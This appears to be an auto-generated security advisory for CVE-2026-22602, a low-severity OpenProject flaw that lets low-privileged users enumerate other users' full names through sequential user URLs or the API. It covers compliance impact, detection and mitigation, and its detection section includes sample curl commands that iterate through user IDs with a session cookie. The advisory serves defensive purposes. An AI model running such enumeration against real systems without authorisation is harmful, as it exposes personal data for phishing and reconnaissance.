Compliance Impact

This vulnerability allows low-privileged logged-in users to enumerate the full names of other users due to improper enforcement of visibility restrictions. Such unauthorized disclosure of personal information could potentially impact compliance with data protection regulations like GDPR or HIPAA, which require safeguarding personal data and limiting access to authorized personnel only. By enabling attackers to compile lists of user full names and infer organizational structure, the vulnerability increases the risk of privacy breaches and targeted attacks, which may lead to non-compliance with these standards. The issue has been addressed in OpenProject version 16.6.2 by properly restricting user visibility. [1]

Useful 0 Not Useful 0

Executive Summary

CVE-2026-22602 is a low-severity vulnerability in OpenProject versions prior to 16.6.2 that allows low-privileged logged-in users to enumerate the full names of other users. Because user IDs are sequential and predictable, an attacker can iterate through user ID URLs or use the OpenProject API to extract a complete list of user full names. This occurs due to improper enforcement of visibility restrictions on user names in API endpoints and user queries. The vulnerability enables attackers to gather user information that should be restricted, facilitating further targeted attacks or reconnaissance. It has been fixed in version 16.6.2 by applying proper visibility scopes and access controls. [1, 3, 4]

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can impact you by allowing an attacker with low privileges to collect full names of all users in your OpenProject instance. This information can be used to construct likely email addresses for targeted phishing attacks and to infer your organization's internal structure for further reconnaissance. Although the confidentiality impact is low, it can facilitate social engineering and targeted attacks against your users. The vulnerability does not affect data integrity or availability. [1]

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by attempting to access user information URLs on your OpenProject instance, such as http://hostname/users/{userID}, where userID is a sequential number. If a low-privileged logged-in user can retrieve full names of other users by iterating through these URLs or via the OpenProject API, the system is vulnerable. Commands to test this could include using curl or wget to request these URLs with different user IDs while authenticated as a low-privileged user. For example: curl -i -b cookies.txt http://hostname/users/1 curl -i -b cookies.txt http://hostname/users/2 ... iterating through user IDs to see if full names are returned. Similarly, API calls can be scripted to enumerate user full names. If these requests succeed in returning user full names without proper authorization, the vulnerability exists. [1]

Useful 0 Not Useful 0

Mitigation Strategies

The immediate steps to mitigate this vulnerability are: 1. Upgrade OpenProject to version 16.6.2 or later, where the issue is patched. 2. If upgrading is not immediately possible, apply the manual patch (21281.patch) that restricts user visibility by applying the User.visible scope. 3. As a temporary mitigation, enable the "Login required" setting to prevent public access and reduce exposure. These steps will help prevent low-privileged users from enumerating full names of other users. [1, 4]

Useful 0 Not Useful 0